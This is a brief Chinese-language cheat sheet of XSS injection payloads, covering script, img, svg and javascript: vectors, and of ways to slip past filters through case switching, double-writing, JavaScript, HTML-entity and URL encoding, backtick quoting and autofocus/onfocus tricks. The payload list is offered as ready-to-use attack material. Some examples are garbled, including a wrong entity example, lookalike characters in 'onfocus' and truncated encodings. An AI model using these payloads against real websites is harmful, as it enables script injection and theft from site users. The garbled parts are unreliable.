xss注入常用语句、
1.<script>alert(1)</script>
2.<img src="#" onmouseover="alert(11)">
3.<img src="#" onerror="alert('xss')">
4.<svg onload=alert(1)>
5.<a href=javascript:alert(1)>
1.尝试双写绕过
2.大小写绕过、
3.js编码#unicode js的一种编码方式。
4.html实体编码
命名实体:以&开头,以分号结尾的,例如"<“的编码是”&#lt;"
字符编码:十进制,十六进制ascii码值或unicode字符编码,样式为"&#数值;"例如“<”可以被编码为“<
”和<
5.url编码
也就是进行两次url的全编码;
6.可以使用空格.换行,tab键或者/**/,/*!a*/
,的形式绕过关键词的检测.
下面介绍几个实例:
1.如果被过滤单引号
可以尝试重音符混淆
<IMG SRC=`javascript:alert(“RSnake says, ‘XSS’”)`>
2.如果尖括号和圆括号被过滤
如果在html标签内部可以使用
" autofocus οnfοcus=alert(1) x="
构造为
<input value="1" autofocus οnfοcus=alert 1 x="">
xxxxxxxxxx" name=javasCript:alert%281%29 autofocus οnfοcus=location=this.name xx
也可以这样对小括号进行双重url编码。绕过圆括号。
注:如果在html实体外部,还没想到咋绕过。
附上两个链接:xss绕过
xss绕过尖括号